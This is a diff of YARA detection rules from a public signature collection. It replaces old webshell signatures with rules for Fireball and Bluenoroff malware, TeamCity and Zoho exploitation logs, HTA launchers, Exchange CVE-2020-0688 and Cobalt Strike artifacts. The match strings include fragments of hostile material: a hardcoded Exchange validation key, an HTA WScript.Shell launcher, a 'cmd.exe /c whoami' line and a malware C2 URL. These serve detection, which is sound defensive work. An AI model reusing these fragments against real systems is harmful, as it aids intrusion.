 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3"
 
 	strings:
-		$s3 = "The encoded password is found at 0x%8.8lx and has a length of %d."
+		$x1 = "\\ClearLog\\Release\\logC.pdb" ascii
+		$s1 = "C:\\Windows\\System32\\cmd.exe /c \"\"" fullword wide
+		$s2 = "logC.dll" fullword ascii
+		$s3 = "hhhhh.exe" fullword wide
+		$s4 = "ttttt.exe" fullword wide
+		$s5 = "Logger Name:" fullword ascii
+		$s6 = "cle.log.1" fullword wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and $x1 or 2 of them )
 }
-rule SIGNATURE_BASE_Pack_Injectt
+rule SIGNATURE_BASE_Fireball_Gubed : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file InjectT.exe"
+		description = "Detects Fireball malware - file gubed.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3a640c22-0cd4-5ab1-9216-c68625d7d505"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8089-L8104"
+		id = "cba2913f-4d9a-5925-ad9a-f5815a635291"
+		date = "2017-06-02"
+		modified = "2022-12-21"
+		reference = "https://goo.gl/4pTkGQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_fireball.yar#L173-L191"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "983b74ccd57f6195a0584cdfb27d55e8"
-		logic_hash = "9f66b7b429ed585888c0fb4943bb12262247b3af8d85bc67309b27752171e66a"
+		logic_hash = "e8053d8a95d41d81940bbaf7945323849613dbcfe727559a07bc294bd834b65f"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e3f69a1fb6fcaf9fd93386b6ba1d86731cd9e5648f7cff5242763188129cd158"
 
 	strings:
-		$s3 = "ail To Open Registry"
-		$s4 = "32fDssignim"
-		$s5 = "vide Internet S"
-		$s6 = "d]Software\\M"
-		$s7 = "TInject.Dll"
+		$x1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\MRT.exe" fullword wide
+		$x2 = "tIphlpapi.dll" fullword wide
+		$x3 = "http://%s/provide?clients=%s&reqs=visit.startload" fullword wide
+		$x4 = "\\Gubed\\Release\\Gubed.pdb" ascii
+		$x5 = "d2hrpnfyb3wv3k.cloudfront.net" fullword wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
 }
-rule SIGNATURE_BASE_FSO_S_Remexp_2
+rule SIGNATURE_BASE_EXPL_Zoho_RCE_Fix_Lines_Dec21_1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file RemExp.asp"
+		description = "Detects lines in log lines of Zoho products that indicate RCE fixes (silent removal of evidence)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "501544d5-fe52-5933-8782-516ffe18f3ff"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8105-L8117"
+		id = "633287e3-a377-5b3c-8520-a7790168eff5"
+		date = "2021-12-06"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/cyb3rops/status/1467784104930385923"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_zoho_rcef_logs.yar#L2-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b69670ecdbb40012c73686cd22696eeb"
-		logic_hash = "e31e25a7c2b2e970a379a61d2dac335bd37cac48328eee9f3966ff5c77ef6f18"
-		score = 75
+		logic_hash = "e6d9c3364da57c03a5e838f485deefabec2f3ec67d19a9017e564ba702a72d03"
+		score = 65
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s2 = " Then Response.Write \""
-		$s3 = "<a href= \"<%=Request.ServerVariables(\"script_name\")%>"
+		$s1 = "RCEF="
+		$sa1 = "\"attackStatus\"\\:\"active\""
+		$sa2 = "\"attackStatus\":\"active\""
+		$sd1 = "deletedCount"
+		$sd_fp1 = "\"deletedCount\"\\:0"
+		$sd_fp2 = "\"deletedCount\":0"
 
 	condition:
-		all of them
+		filesize < 6MB and $s1 and ( 1 of ( $sa* ) or ( $sd1 and not 1 of ( $sd_fp* ) ) )
 }
-rule SIGNATURE_BASE_FSO_S_C99
+rule SIGNATURE_BASE_Bluenoroffpos_DLL
 {
 	meta:
-		description = "Webshells Auto-generated - file c99.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0b176370-a5ab-587a-b0e9-ef4fe5c604bd"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8118-L8129"
+		description = "Bluenoroff POS malware - hkp.dll"
+		author = "Florian Roth"
+		id = "d2b34b50-c7eb-5852-ba5d-734dd5038c2e"
+		date = "2018-06-07"
+		modified = "2023-12-05"
+		reference = "http://blog.trex.re.kr/3?category=737685"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_bluenoroff_pos.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5f9ba02eb081bba2b2434c603af454d0"
-		logic_hash = "de769299bbd8b895b84db757fcc037b807f7caaa624c06e9d330934a968b2381"
+		logic_hash = "39f23045b3e5ef60c199091b7f01ac2a3a31bcb95219aebb9a4cfd0764886f19"
 		score = 75
-		quality = 85
+		quality = 73
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htacce"
+		$dll = "ksnetadsl.dll" ascii wide fullword nocase
+		$exe = "xplatform.exe" ascii wide fullword nocase
+		$agent = "Nimo Software HTTP Retriever 1.0" ascii wide nocase
+		$log_file = "c:\\windows\\temp\\log.tmp" ascii wide nocase
+		$base_addr = "%d-BaseAddr:0x%x" ascii wide nocase
+		$func_addr = "%d-FuncAddr:0x%x" ascii wide nocase
+		$HF_S = "HF-S(%d)" ascii wide
+		$HF_T = "HF-T(%d)" ascii wide
 
 	condition:
-		all of them
+		5 of them
 }
-rule SIGNATURE_BASE_Rknt_Zip_Folder_Rknt
+rule SIGNATURE_BASE_LOG_EXPL_SUSP_Teamcity_CVE_2023_42793_Oct23_1 : CVE_2023_42793
 {
 	meta:
-		description = "Webshells Auto-generated - file RkNT.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a58a3b33-8096-535a-b930-2eb71347edb8"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8130-L8147"
+		description = "Detects log entries that could indicate a successful exploitation of CVE-2023-42793 on TeamCity servers"
+		author = "Florian Roth"
+		id = "81c04863-72aa-5515-889e-3ef718360cac"
+		date = "2023-10-02"
+		modified = "2023-12-05"
+		reference = "https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_teamcity_2023_42793.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5f97386dfde148942b7584aeb6512b85"
-		logic_hash = "59de8a40a7081ee5fbea9f413590237c1da9985f2352b32571529baf38c93ddb"
-		score = 75
+		logic_hash = "3b6c8e3e3ff91563899ca94904a56460cd702a3e58e0aacf1c3acb506ec3f959"
+		score = 70
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2023-42793"
 
 	strings:
-		$s0 = "PathStripPathA"
-		$s1 = "`cLGet!Addr%"
-		$s2 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
-		$s3 = "oQToOemBuff* <="
-		$s4 = "ionCdunAsw[Us'"
-		$s6 = "CreateProcessW: %S"
-		$s7 = "ImageDirectoryEntryToData"
+		$sa1 = "File edited: "
+		$sa2 = "\\TeamCity\\config\\internal.properties by user with id="
+		$sb1 = "s.buildServer.ACTIVITIES.AUDIT - server_file_change: File "
+		$sb2 = "\\TeamCity\\config\\internal.properties was modified by \"user with id"
 
 	condition:
-		all of them
+		all of ( $sa* ) or all of ( $sb* )
 }
-rule SIGNATURE_BASE_Dbgntboot
+rule SIGNATURE_BASE_LOG_EXPL_SUSP_Teamcity_Oct23_1
 {
 	meta:
-		description = "Webshells Auto-generated - file dbgntboot.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6b9381e6-597d-5e74-a318-9931d20a9d08"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8148-L8160"
+		description = "Detects log entries that could indicate a successful exploitation of TeamCity servers"
+		author = "Florian Roth"
+		id = "4845b40a-cf77-53ae-b2fa-d1ed861153f2"
+		date = "2023-10-02"
+		modified = "2023-12-05"
+		reference = "https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_teamcity_2023_42793.yar#L20-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4d87543d4d7f73c1529c9f8066b475ab"
-		logic_hash = "10f86f18aff4995928efb3c8000eca166fe37e6006de7938139cad718ff7653f"
-		score = 75
+		logic_hash = "a2f0abffb9c72e6b32875310e5af7365b6cab4e6c4f6188daa3085b57c38ed0e"
+		score = 70
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp"
-		$s3 = "sth junk the M$ Wind0wZ retur"
+		$a1 = "tbrains.buildServer.ACTIVITIES"
+		$s1 = "External process is launched by user user with id"
+		$s2 = ". Command line: cmd.exe \"/c whoami"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_PHP_Shell
+rule SIGNATURE_BASE_HTA_With_Wscript_Shell
 {
 	meta:
-		description = "Webshells Auto-generated - file shell.php"
+		description = "Detects WScript Shell in HTA"
 		author = "Florian Roth (Nextron Systems)"
-		id = "08dff4db-3b1c-5702-a8c9-efaedf83c4ff"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8161-L8173"
+		id = "2faf74b1-c19c-53f0-ad08-be9caf5640bc"
+		date = "2017-06-21"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/msftmmpc/status/877396932758560768"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_hta_anomalies.yar#L11-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "45e8a00567f8a34ab1cccc86b4bc74b9"
-		logic_hash = "a62061b2fa851f5798158198e26f188408f3f37dca69a85ca155777c0b8407ee"
-		score = 75
+		logic_hash = "7ce2728fbd3023a6b96291cdb63f30dc9b71e5fc506f8b00ad97e3062b103478"
+		score = 80
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ca7b653cf41e980c44311b2cd701ed666f8c1dbc"
 
 	strings:
-		$s0 = "AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz"
-		$s11 = "1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s"
+		$s1 = "<hta:application windowstate=\"minimize\"/>"
+		$s2 = "<script>var b=new ActiveXObject(\"WScript.Shell\");" ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Hxdef100
+rule SIGNATURE_BASE_HTA_Embedded
 {
 	meta:
-		description = "Webshells Auto-generated - file hxdef100.exe"
+		description = "Detects an embedded HTA file"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fb376c18-02d2-5866-a0e2-ccb5262091dd"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8174-L8187"
+		id = "04d4c718-9dd6-5528-8712-61c9f2a16139"
+		date = "2017-06-21"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/msftmmpc/status/877396932758560768"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_hta_anomalies.yar#L28-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "55cc1769cef44910bd91b7b73dee1f6c"
-		logic_hash = "a2002dcddad7ffdbe9614723163016f9357347bb704640d3933ce4513c37d474"
-		score = 75
+		logic_hash = "843f0ad5e39e5492db8ff7372f6d2038e7dbb7823ec9b33f863ab891a108b1ec"
+		score = 50
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ca7b653cf41e980c44311b2cd701ed666f8c1dbc"
 
 	strings:
-		$s0 = "RtlAnsiStringToUnicodeString"
-		$s8 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
-		$s9 = "\\\\.\\mailslot\\hxdef-rk100sABCDEFGH"
+		$s1 = "<hta:application windowstate=\"minimize\"/>"
 
 	condition:
-		all of them
+		$s1 and not $s1 in ( 0 .. 50000 )
 }
-rule SIGNATURE_BASE_Rdrbs100
+rule SIGNATURE_BASE_VUL_Exchange_CVE_2020_0688 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file rdrbs100.exe"
+		description = "Detects static validation key used by Exchange server in web.config"
 		author = "Florian Roth (Nextron Systems)"
-		id = "369e5ce0-984c-54eb-96d4-fbfb4f932ba6"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8188-L8200"
+		id = "1065f297-0dc4-5dcb-b0f3-c89d06ff5e69"
+		date = "2020-02-26"
+		modified = "2023-12-05"
+		reference = "https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_cve_2020_0688.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7c752bcd6da796d80a6830c61a632bff"
-		logic_hash = "8a427ef9e0ecd0c810913203aaef43647964f33658dfdca8195fce6f0545f8f4"
-		score = 75
+		logic_hash = "035971028d36c8bbcc6a274817187adfbfefe530ff6808af5a7c0b4667c1bd8b"
+		score = 60
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s3 = "Server address must be IP in A.B.C.D format."
-		$s4 = " mapped ports in the list. Currently "
+		$h1 = "<?xml "
+		$x1 = "<machineKey validationKey=\"CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\"" ascii wide
 
 	condition:
-		all of them
+		filesize <= 300KB and $h1 at 0 and $x1
 }
-rule SIGNATURE_BASE_Mithril_Mithril
+rule SIGNATURE_BASE_SUSP_Xored_Mozilla_Oct19
 {
 	meta:
-		description = "Webshells Auto-generated - file Mithril.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "81645f57-7d7e-5b4d-b323-744f2cde4916"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8201-L8219"
+		description = "Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key."
+		author = "Florian Roth"
+		id = "71e5b399-c384-5330-ae52-4e0a806e7969"
+		date = "2019-10-28"
+		modified = "2023-11-03"
+		old_rule_name = "SUSP_XORed_Mozilla"
+		reference = "https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force()"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_xor_hunting.yar#L2-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "017191562d72ab0ca551eb89256650bd"
-		logic_hash = "5d19eb4132a0401d226c9cffc927b2838e9c69428746296b55a488d097759587"
-		score = 75
+		logic_hash = "e1b5c7a0adb4dc65cdf0a653255ac865a0ecebbf1ff08b7fc46d510d5e8aa6c9"
+		score = 60
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "OpenProcess error!"
-		$s1 = "WriteProcessMemory error!"
-		$s4 = "GetProcAddress error!"
-		$s5 = "HHt`HHt\\"
-		$s6 = "Cmaudi0"
-		$s7 = "CreateRemoteThread error!"
-		$s8 = "Kernel32"
-		$s9 = "VirtualAllocEx error!"
+		$xo1 = "Mozilla/5.0" xor ascii wide
+		$xof1 = "Mozilla/5.0" ascii wide
+		$fpa1 = "Sentinel Labs" wide
+		$fpa2 = "<filter object at" ascii
+		$fpb1 = { 64 65 78 0a 30 33 35 }
 
 	condition:
-		all of them
+		$xo1 and not $xof1 and not 1 of ( $fpa* ) and not $fpb1 at 0
 }
-rule SIGNATURE_BASE_Hxdef100_2
+rule SIGNATURE_BASE_SUSP_Xored_MSDOS_Stub_Message : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file hxdef100.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1f079b73-29de-50cf-868c-1639a43e576f"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8220-L8233"
+		description = "Detects suspicious XORed MSDOS stub message"
+		author = "Florian Roth"
+		id = "9ab52434-9162-5fd5-bf34-8b163f6aeec4"
+		date = "2019-10-28"
+		modified = "2023-10-11"
+		reference = "https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_xor_hunting.yar#L27-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1b393e2e13b9c57fb501b7cd7ad96b25"
-		logic_hash = "d44131f6c1bfdc36079f474832a79a361dfad96d1b84f7004d682150c93eccc5"
-		score = 75
+		logic_hash = "b6d7d7242511d2c26122fe2b880cfe39facb5f68ae45e19c1558163f0427c304"
+		score = 55
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "\\\\.\\mailslot\\hxdef-rkc000"
-		$s2 = "Shared Components\\On Access Scanner\\BehaviourBlo"
-		$s6 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
+		$xo1 = "This program cannot be run in DOS mode" xor(0x01-0xff) ascii wide
+		$xo2 = "This program must be run under Win32" xor(0x01-0xff) ascii wide
+		$fp1 = "AVAST Software" fullword wide ascii
+		$fp2 = "AVG Netherlands" fullword wide ascii
+		$fp3 = "AVG Technologies" ascii wide
+		$fp4 = "Malicious Software Removal Tool" wide
+		$fp5 = "McAfee Labs" fullword ascii wide
+		$fp6 = "Kaspersky Lab" fullword ascii wide
+		$fp7 = "<propertiesmap>" ascii wide
+		$fp10 = "Avira Engine Module" wide
+		$fp11 = "syntevo GmbH" wide fullword
+		$fp13 = "SophosClean" ascii
+		$fp14 = "SophosHomeClean" wide
 
 	condition:
-		all of them
+		1 of ( $x* ) and not 1 of ( $fp* ) and not uint16( 0 ) == 0xb0b0 and not uint16( 0 ) == 0x5953
 }
-rule SIGNATURE_BASE_Release_Dlltest
+rule SIGNATURE_BASE_Cobaltstrike_C2_Host_Indicator : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file dllTest.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "af821252-8409-5572-9014-59e8c5feaacd"
-		date = "2016-02-15"
-		modified = "2025-11-03"
+		description = "Detects CobaltStrike C2 host artifacts"
+		author = "yara@s3c.za.net"
+		id = "7f15ee30-664e-59b8-9e31-35d88e58a45e"
+		date = "2019-08-16"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8234-L8254"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cobaltstrike_evasive.yar#L1-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "76a59fc3242a2819307bb9d593bef2e0"
-		logic_hash = "ba759ae1bbde357085b2b2dfda0780b5a239a44b4e999244e8eceed246090ce3"
-		score = 50
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "4761e282e9473ba665a597894ed514d057309703a7d5b4e462ef0e779bbb8c39"
+		score = 60
+		quality = 65
+		tags = "FILE"
 
 	strings:
-		$s0 = ";;;Y;`;d;h;l;p;t;x;|;"
-		$s1 = "0 0&00060K0R0X0f0l0q0w0"
-		$s2 = ": :$:(:,:0:4:8:D:`=d="
-		$s3 = "4@5P5T5\\5T7\\7d7l7t7|7"
-		$s4 = "1,121>1C1K1Q1X1^1e1k1s1y1"
-		$s5 = "9 9$9(9,9P9X9\\9`9d9h9l9p9t9x9|9"
-		$s6 = "0)0O0\\0a0o0\"1E1P1q1"
-		$s7 = "<.<I<d<h<l<p<t<x<|<"
-		$s8 = "3&31383>3F3Q3X3`3f3w3|3"
-		$s9 = "8@;D;H;L;P;T;X;\\;a;9=W=z="
+		$c2_indicator_fp = "#Host: %s"
+		$c2_indicator = "#Host:"
 
 	condition:
-		all of them
+		$c2_indicator and not $c2_indicator_fp and not uint32( 0 ) == 0x0a786564 and not uint32( 0 ) == 0x0a796564
 }
-rule SIGNATURE_BASE_Webadmin
+rule SIGNATURE_BASE_Cobaltstrike_Sleep_Decoder_Indicator
 {
 	meta:
-		description = "Webshells Auto-generated - file webadmin.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "615d87f8-9094-5994-aea1-d7276623fbca"
-		date = "2016-02-15"
-		modified = "2025-11-03"
+		description = "Detects CobaltStrike sleep_mask decoder"
+		author = "yara@s3c.za.net"
+		id = "d5b53d68-55f9-5837-9b0c-e7be2f3bd072"
+		date = "2021-07-19"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8255-L8266"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cobaltstrike_evasive.yar#L16-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3a90de401b30e5b590362ba2dde30937"
-		logic_hash = "6e215c3d8b8357b839416ee6951f7739387bb94aa1284ea7e827ae2205221294"
+		logic_hash = "f3243c326df18edbd15c2d9120379588e61709efb9295b9584c0565c04ee38a5"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpu"
+		$sleep_decoder = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 4C 8B 51 08 41 8B F0 48 8B EA 48 8B D9 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 }
 
 	condition:
-		all of them
+		$sleep_decoder
 }
-rule SIGNATURE_BASE_Commands
+rule SIGNATURE_BASE_Cobaltstrike_C2_Encoded_XOR_Config_Indicator
 {
 	meta:
-		description = "Webshells Auto-generated - file commands.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7cffefc7-4f24-5908-82a4-f11eda398377"
-		date = "2016-02-15"
-		modified = "2025-11-03"
+		description = "Detects CobaltStrike C2 encoded profile configuration"
+		author = "yara@s3c.za.net"
+		id = "8e33c63d-eaba-5851-88f4-ef7261a0a618"
+		date = "2021-07-08"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8267-L8279"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cobaltstrike_evasive.yar#L28-L295"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "174486fe844cb388e2ae3494ac2d1ec2"
-		logic_hash = "5251ee090934c8f99a8a2ffef2605593943306937dc56a135a47f1da7e732587"
+		logic_hash = "6b25ee9064e925c183ef7599c95ecffce48c7f96eea714fa5f6441b21716277e"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "If CheckRecord(\"SELECT COUNT(ID) FROM VictimDetail WHERE VictimID = \" & VictimID"
-		$s2 = "proxyArr = Array (\"HTTP_X_FORWARDED_FOR\",\"HTTP_VIA\",\"HTTP_CACHE_CONTROL\",\"HTTP_F"
+		$s000 = { 00 01 00 01 00 02 ?? ?? 00 02 00 01 00 02 ?? ?? 00 03 00 02 00 04 ?? ?? ?? ?? 00 04 00 02 00 04 ?? ?? ?? ?? 00 05 00 01 00 02 ?? ?? }
+		$s001 = { 01 00 01 00 01 03 ?? ?? 01 03 01 00 01 03 ?? ?? 01 02 01 03 01 05 ?? ?? ?? ?? 01 05 01 03 01 05 ?? ?? ?? ?? 01 04 01 00 01 03 ?? ?? }
+		$s002 = { 02 03 02 03 02 00 ?? ?? 02 00 02 03 02 00 ?? ?? 02 01 02 00 02 06 ?? ?? ?? ?? 02 06 02 00 02 06 ?? ?? ?? ?? 02 07 02 03 02 00 ?? ?? }
+		$s003 = { 03 02 03 02 03 01 ?? ?? 03 01 03 02 03 01 ?? ?? 03 00 03 01 03 07 ?? ?? ?? ?? 03 07 03 01 03 07 ?? ?? ?? ?? 03 06 03 02 03 01 ?? ?? }
+		$s004 = { 04 05 04 05 04 06 ?? ?? 04 06 04 05 04 06 ?? ?? 04 07 04 06 04 00 ?? ?? ?? ?? 04 00 04 06 04 00 ?? ?? ?? ?? 04 01 04 05 04 06 ?? ?? }
+		$s005 = { 05 04 05 04 05 07 ?? ?? 05 07 05 04 05 07 ?? ?? 05 06 05 07 05 01 ?? ?? ?? ?? 05 01 05 07 05 01 ?? ?? ?? ?? 05 00 05 04 05 07 ?? ?? }
+		$s006 = { 06 07 06 07 06 04 ?? ?? 06 04 06 07 06 04 ?? ?? 06 05 06 04 06 02 ?? ?? ?? ?? 06 02 06 04 06 02 ?? ?? ?? ?? 06 03 06 07 06 04 ?? ?? }
